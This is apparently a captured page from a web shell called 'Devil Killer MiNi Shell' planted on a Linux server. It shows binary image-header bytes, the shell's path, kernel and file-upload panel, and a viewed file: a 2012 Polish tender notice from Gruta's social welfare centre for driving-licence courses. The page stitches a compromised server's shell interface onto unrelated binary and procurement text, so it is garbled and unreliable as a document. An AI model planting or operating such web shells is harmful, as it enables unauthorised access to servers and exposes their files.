JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120702/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120702/230774-N-2012.html

<p class="kh_header"><b>Gruta: Zorganizowanie i przeprowadzenie kursów prawa jazdy  dla uczestników projektu systemowego Aktywna integracja w Gminie Gruta - drogą do zatrudnienia</b><br>
<b>Numer ogłoszenia: 230774 - 2012; data zamieszczenia: 02.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek Pomocy Społecznej , Gruta 244, 86-330 Gruta, woj. kujawsko-pomorskie, tel. 56 468 31 21, faks 56 468 31 88.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http:www.bip.gruta.akcessnet.net</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie kursów prawa jazdy  dla uczestników projektu systemowego Aktywna integracja w Gminie Gruta - drogą do zatrudnienia.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> ROZDZIAŁ II - OPIS PRZEDMIOTU ZAMÓWIENIA
1.	Przedmiotem zamówienia  jest zorganizowanie i przeprowadzenie kursów prawa jazdy  dla uczestników projektu systemowego Aktywna integracja w Gminie Gruta - drogą do zatrudnienia w następującym zakresie:
a.	Zadanie numer 1 - Kurs prawa jazdy kat. B dla 11 osób.
b.	Zadanie numer 2 - Kurs prawa jazdy kat. C+E poprzedzony kursem kat. C dla 3 osób.
c.	 Zadanie numer 3- Kurs kwalifikacji wstępnej przyspieszonej na przewóz rzeczy  wraz z egzaminem 2 osób pow. 21 r.ż., które uzyskają uprawnienia prawa jazdy kat. C, C+E.
d.	Zadanie numer 4 -  Kurs kwalifikacji wstępnej pełnej na przewóz rzeczy  wraz z egzaminem dla 1 osoby (poniżej 21 lat) , która uzyska uprawnienia prawa jazdy kat. C, C+E.
2.	Szczegółowy opis przedmiotu zamówienia
2.1. Zadanie numer 1 - Kurs prawa jazdy kat. B dla 11 osób.
Do istotnych warunków zamówienia należy:
2.1.1. zorganizowanie i przeprowadzenie kursu prawa jazdy kat. B dla 11 osób, 
2.1.2. zapewnienie przeprowadzenia i opłacenie badań lekarskich  uczestników kursu w celu wydania zaświadczeń niezbędnych do rozpoczęcia kursu,  
2.1.3. ubezpieczenie NNW uczestników kursu; 
2.1.4. sprawdzenie umiejętności kursantów w części teoretycznej i praktycznej przed dopuszczeniem do egzaminów państwowych (egzamin wewnętrzny);
2.1.5. opłacenie jednego podejść do egzaminu państwowego dla każdego uczestnika;
  2.1.6. miejsce realizacji zamówienia: teren miasta  Grudziądz;  
2.1.7. ilość godzin zajęć teoretycznych i praktycznych zgodna z obowiązującymi przepisami prawa;
2.1.8. załączenie harmonogramu zajęć uzgodnionego z Zamawiającym przed podpisaniem umowy;
2.1.9. Wykonawca zobowiązany będzie do prowadzenia dokumentacji przebiegu kursu:
a)	dziennika zajęć edukacyjnych zawierający listę obecności, wymiar godzin i tematy zajęć edukacyjnych, na każdym szkoleniu powinna być wydana dla osoby skierowanej karta prowadzonych zajęć. Wszystkie dokumenty powinny być oznakowane zgodnie z wytycznymi realizacji programów POKL.
2.1.10.  Wykonawca po zakończeniu kursów i obyciu egzaminów  jest zobowiązany w ciągu 7 dni   roboczych przekazać Zamawiającemu:
b)	list  obecności  uczestników na poszczególnych etapach realizacji kursu 
c)	oryginalne lub potwierdzone za zgodność z oryginałem kserokopie zaświadczeń lub innych dokumentów potwierdzających ukończenie kursu w części teoretycznej i praktycznej,
d)	zdjęć ze szkolenia, 
e)	kserokopii badań lekarskich,
f)	potwierdzenie otrzymania przez uczestników szkolenia materiałów szkoleniowych,
g)	kserokopii polisy ubezpieczeniowej uczestników,
h)	kserokopii protokołu z egzaminu wewnętrznego
i)	imienny wykaz osób, które nie ukończyły kursu, nie zdały egzaminu lub nie przystąpiły do egzaminu.

2.1.11. Wykonawca zobowiązany jest:
  a)  udostępnić Zamawiającemu  na  jego żądanie dokumentów dotyczących postępów w realizacji  szkoleń. Zamawiający zastrzega sobie prawo prowadzenia bieżącego nadzoru nad realizacją kursów, na każdym ich etapie,
b)	 poddać się kontroli  dokonywanej przez Zamawiającego jak i Instytucji Pośredniczącej -Regionalnego Ośrodka Polityki Społecznej w Toruniu, 
c)	niezwłocznie  poinformować Zamawiającego o wszelkich zmianach i problemach mających wpływ  na przebieg realizacji kursu.

2.2. Zadanie numer 2 - Kurs prawa jazdy kat. C+E poprzedzony kursem kat. C dla 3 osób.
Do istotnych warunków zamówienia należy:
2.2.1. zorganizowanie i przeprowadzenie kursu prawa jazdy kat. C+E dla 3 osób, poprzedzonego kursem kat.C. Zadanie  będzie odbywało się w dwóch etapach. Wykonawca przeprowadzi kurs kategorii C, po zakończeniu którego każdy uczestnik podejdzie do egzaminu państwowego, opłaconego przez Wykonawcę. W przypadku negatywnego wyniku egzaminu,  uczestnik zobowiązany jest na własny koszt  przystąpić do kolejnego egzaminu. Po zdaniu egzaminu uczestnik zrealizuje drugi etap kursu tzn. kurs kat. C+E, po czym przystąpi do egzaminu państwowego opłaconego przez Wykonawcę. W przypadku negatywnego wyniku egzaminu,  uczestnik zobowiązany jest na własny koszt  przystąpić do kolejnego egzaminu państwowego. 
2.2.2. zapewnienie przeprowadzenia i opłacenie badań lekarskich w celu wydania zaświadczeń niezbędnych do rozpoczęcia kursu, w przypadku negatywnej opinii lekarza w sprawie wydania zaświadczenia dla którejś ze skierowanych osób, osoba ta nie będzie uczestniczyć w kursie i Zamawiający nie poniesie kosztów z tym związanych, poza kosztami konsultacji lekarskiej, a ilość uczestników kursu zostanie uzupełniona przez Zamawiającego;
2.2.3. ubezpieczenie NNW uczestników kursu;
2.2.4. sprawdzenie umiejętności kursantów w części teoretycznej i praktycznej przed dopuszczeniem do egzaminów państwowych (egzamin wewnętrzny);
2.2.5. miejsce realizacji zamówienia: teren miasta Grudziądz
2.2.6. ilość godzin zajęć teoretycznych i praktycznych zgodna z obowiązującymi przepisami prawa;
2.2.7. załączenie harmonogramu zajęć uzgodnionego z Zamawiającym przed podpisaniem umowy;
2.2.8. Wykonawca zobowiązany będzie do prowadzenia dokumentacji przebiegu kursu:
a)	dziennika zajęć edukacyjnych zawierający listę obecności, wymiar godzin i tematy zajęć edukacyjnych, na każdym szkoleniu powinna być wydana dla osoby skierowanej karta prowadzonych zajęć. Wszystkie dokumenty powinny być oznakowane zgodnie z wytycznymi realizacji programów POKL.
2.2.9.  Wykonawca po zakończeniu kursów i obyciu egzaminów  jest zobowiązany w ciągu 7 dni   roboczych przekazać Zamawiającemu:
a)	list obecności  uczestników na poszczególnych etapach realizacji kursu, 
b)	oryginalne lub potwierdzone za zgodność z oryginałem kserokopie zaświadczeń lub innych dokumentów potwierdzających ukończenie kursu w części teoretycznej i praktycznej,
c)	zdjęć ze szkolenia, 
d)	kserokopii badań lekarskich,
e)	potwierdzenie otrzymania przez uczestników szkolenia materiałów szkoleniowych,
f)	kserokopii polisy ubezpieczeniowej uczestników,
g)	kserokopii protokołu z egzaminu wewnętrznego,
h)	imienny wykaz osób, które nie ukończyły kursu, nie zdały egzaminu lub nie przystąpiły do egzaminu.

2.2.10 Wykonawca zobowiązany jest:
a)	udostępnić Zamawiającemu  na  jego żądanie dokumentów dotyczących postępów w realizacji  szkoleń. Zamawiający zastrzega sobie prawo prowadzenia bieżącego nadzoru nad realizacją kursów, na każdym ich etapie.
b)	 poddać się kontroli  dokonywanej przez Zamawiającego jak i Instytucji Pośredniczącej -Regionalnego Ośrodka Polityki Społecznej w Toruniu, 
c)	niezwłocznie  poinformować Zamawiającego o wszelkich zmianach i problemach mających wpływ  na przebieg realizacji kursu.

2.3 Zadanie numer 3- Kurs kwalifikacji wstępnej przyspieszonej na przewóz rzeczy wraz z egzaminem dla 2 osób pow. 21 r.ż., które uzyskają uprawnienia prawa jazdy kat. C, C+E.
Do istotnych warunków zamówienia należy:
2.3.1. zorganizowanie i przeprowadzenie kursu kwalifikacji wstępnej przyspieszonej na dla 2 osób  w wieku powyżej 21. roku życia zgodnie z obowiązującymi przepisami prawa;
2.3.2. zorganizowanie przeprowadzenia i opłacenie badań lekarskich  uczestników kursu w celu wydania zaświadczenia niezbędnego do rozpoczęcia kursu, 
2.3.3. ubezpieczenie NNW uczestnika kursu; 
2.3.4. opłacenie i przeprowadzenia egzaminu  uprawniającego uczestnika kursu do otrzymania świadectwa kwalifikacji.
2.3.5. ilość godzin zajęć teoretycznych i praktycznych musi być zgodna z obowiązującymi przepisami prawa; 
2.3.6. załączenie harmonogramu zajęć realizacji zadania uzgodnionego z Zamawiającym przed podpisaniem umowy;
2.3.7. Wykonawca zobowiązany będzie do prowadzenia dokumentacji przebiegu kursu:
a) dziennik zajęć edukacyjnych zawierający listę obecności, wymiar godzin i tematy zajęć edukacyjnych,
b) protokół z egzaminu wewnętrznego,
c) przekazania kserokopii w/w dokumentacji, potwierdzonej za zgodność z oryginałem wraz z fakturą w terminie 7 dni od daty zakończenia szkolenia;
2.3.8. Wykonawca po zakończeniu kursów i obyciu egzaminów  jest zobowiązany w ciągu 7 dni   roboczych przekazać Zamawiającemu:
a)	list obecności  uczestników na poszczególnych etapach realizacji kursu, 
b)	oryginalne lub potwierdzone za zgodność z oryginałem kserokopie zaświadczeń lub innych dokumentów potwierdzających ukończenie kursu w części teoretycznej i praktycznej,
c)	zdjęć ze szkolenia, 
d)	kserokopii badań lekarskich,
e)	potwierdzenie otrzymania przez uczestników szkolenia materiałów szkoleniowych,
f)	kserokopii polisy ubezpieczeniowej uczestników,
g)	kserokopii protokołu z egzaminu wewnętrznego,
h)	imienny wykaz osób, które nie ukończyły kursu, nie zdały egzaminu lub nie przystąpiły do egzaminu.

2.3.9 Wykonawca zobowiązany jest:
a)	udostępnić Zamawiającemu  na  jego żądanie dokumentów dotyczących postępów w realizacji  szkoleń. Zamawiający zastrzega sobie prawo prowadzenia bieżącego nadzoru nad realizacją kursów, na każdym ich etapie.
b)	 poddać się kontroli  dokonywanej przez Zamawiającego jak i Instytucji Pośredniczącej -Regionalnego Ośrodka Polityki Społecznej w Toruniu, 
c)	niezwłocznie  poinformować Zamawiającego o wszelkich zmianach i problemach mających wpływ  na przebieg realizacji kursu.

2.4. Zadanie numer 4- Kurs kwalifikacji wstępnej pełnej na przewóz rzeczy wraz z egzaminem dla 1 osoby.
Do istotnych warunków zamówienia należy:
2.4.1. zorganizowanie i przeprowadzenie kursu kwalifikacji wstępnej pełnej na dla 1 osoby w wieku poniżej  21 roku życia;
2.4.2. zorganizowanie przeprowadzenia i opłacenie badań lekarskich  uczestnika kursu w celu wydania zaświadczenia niezbędnego do rozpoczęcia kursu;
2.4.3. ubezpieczenie NNW uczestnika kursu; 
2.4.4. opłacenie i przeprowadzenia egzaminu  uprawniającego uczestnika kursu do otrzymania świadectwa kwalifikacji.
2.4.5. ilość godzin zajęć teoretycznych i praktycznych musi być zgodna z obowiązującymi przepisami;
2.4.6. załączenie harmonogramu zajęć realizacji zadania uzgodnionego z Zamawiającym przed podpisaniem umowy;
2.4.7. Wykonawca zobowiązany będzie do prowadzenia dokumentacji przebiegu kursu:
a) dziennik zajęć edukacyjnych zawierający listę obecności, wymiar godzin i tematy zajęć edukacyjnych,
b) protokół z egzaminu wewnętrznego,
c) przekazania kserokopii w/w dokumentacji, potwierdzonej za zgodność z oryginałem wraz z fakturą w terminie 7 dni od daty zakończenia szkolenia;
2.4.8. Wykonawca po zakończeniu kursów i obyciu egzaminów  jest zobowiązany w ciągu 7 dni   roboczych przekazać Zamawiającemu:
a)	list obecności  uczestników na poszczególnych etapach realizacji kursu, 
b)	oryginalne lub potwierdzone za zgodność z oryginałem kserokopie zaświadczeń lub innych dokumentów potwierdzających ukończenie kursu w części teoretycznej i praktycznej,
c)	zdjęć ze szkolenia, 
d)	kserokopii badań lekarskich,
e)	potwierdzenie otrzymania przez uczestników szkolenia materiałów szkoleniowych,
f)	kserokopii polisy ubezpieczeniowej uczestników,
g)	kserokopii protokołu z egzaminu wewnętrznego.
h)	imienny wykaz osób, które nie ukończyły kursu, nie zdały egzaminu lub nie przystąpiły do egzaminu.
2.4.9. Wykonawca zobowiązany jest:
a)	udostępnić Zamawiającemu  na  jego żądanie dokumentów dotyczących postępów w realizacji  szkoleń. Zamawiający zastrzega sobie prawo prowadzenia bieżącego nadzoru nad realizacją kursów, na każdym ich etapie.
b)	poddać się kontroli  dokonywanej przez Zamawiającego jak i Instytucji Pośredniczącej -Regionalnego Ośrodka Polityki Społecznej w Toruniu, 
c)	niezwłocznie  poinformować Zamawiającego o wszelkich zmianach i problemach mających wpływ  na przebieg realizacji kursu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający  dopuszcza udzielenie zamówień  uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy Prawo zamówień publicznych w ilości do 50% wartości zamówienia.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.41.12.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi posiadać zezwolenie z właściwego organu na prowadzenie działalności w zakresie szkolenia kierowców.  Ponadto Wykonawca składa oświadczenia o spełnianiu warunków udziału w postępowaniu - załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca oświadcza, że posiada wiedzę i doświadczenie w  zakresie umożliwiającym prawidłowe wykonanie zamówienia  - wzór załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli Wykonawca posiada potencjał techniczny do realizacji zadania tj.:   dysponuje przynajmniej dwoma pojazdami do nauki jazdy w zakresie kat. B, przynajmniej jednym samochodem ciężarowym z przyczepą oraz warunkami technicznymi  zgodnie z warunkami określonymi  w   Ustawie z dnia 20 czerwca 1997 r. Prawo o ruchu drogowym (tj. Dz. U. z 2005 r., Nr 108, poz. 908 ze zm.,  ustawy z dnia 6 września 2001 r. o transporcie drogowym (Dz. U. z 2007 r. Nr 125, poz. 874 ze zmianami),  Rozporządzenie Ministra Infrastruktury z dnia 1 kwietnia 2010r. w sprawie szkolenia kierowców wykonujących przewóz drogowy (Dz. U. Nr 53, poz. 314 z 2010 roku).  oraz aktami wykonawczymi,  (do oferty należy dołączyć kserokopie dowodów rejestracyjnych wskazanych pojazdów, będących własnością Wykonawcy, a w przypadku wynajmu lub leasingu należy do oferty dołączyć stosowne dokumenty,  umowy - na potwierdzenie tego faktu) - wzór zał. nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli Wykonawca dysponuje przynajmniej dwiema  osobami zdolnymi do wykonania zamówienia oraz posiadającymi kwalifikacje niezbędne do wykonania zamówienia tj.: instruktorami posiadającymi uprawnienia (dokumenty potwierdzające uprawnienia do przeprowadzenia szkolenia) , zgodnie z warunkami określonymi  w   Ustawie z dnia 20 czerwca 1997 r. Prawo o ruchu drogowym tj. Dz. U. z 2005 r., Nr 108, poz. 908 ze zm.,  ustawie z dnia 6 września 2001 r. o transporcie drogowym (Dz. U. z 2007 r. Nr 125, poz. 874 ze zmianami),  Rozporządzeniem Ministra Infrastruktury z dnia 1 kwietnia 2010r. w sprawie szkolenia kierowców wykonujących przewóz drogowy (Dz. U. Nr 53, poz. 314 z 2010 roku)  oraz aktami wykonawczymi, poprzez wykazanie osób, które będą uczestniczyć w realizacji szkolenia  i  wskazanie podstawy dysponowania tymi osobami  z oświadczeniem Wykonawcy wg wzoru - załącznik nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli Wykonawca oświadczy, że znajduje się w sytuacji  ekonomicznej i finansowej  zapewniającej  wykonanie zamówienia  -  zał. nr 2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Druk - Formularz oferty - załącznik nr 1 do SIWZ b) Oświadczenie wykonawcy dotyczące spełnienia warunków udziału w postępowaniu załącznik nr 2 do SIWZ c)Wykaz osób, które będą uczestniczyć w realizacji zadania - załącznik nr 3 do SIWZ d)Potencjał techniczny niezbędny do realizacji poszczególnych zadań załącznik nr 4 do SIWZ e) Projekt umowy -załącznik nr 5 do SIWZ. Projekt umowy należy złożyć zaparafowany na każdej stronie przez osobę/y uprawnione. Zamawiający przyjmuje, że postanowienia projektu umowy są wiążące do chwili podpisania umowy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
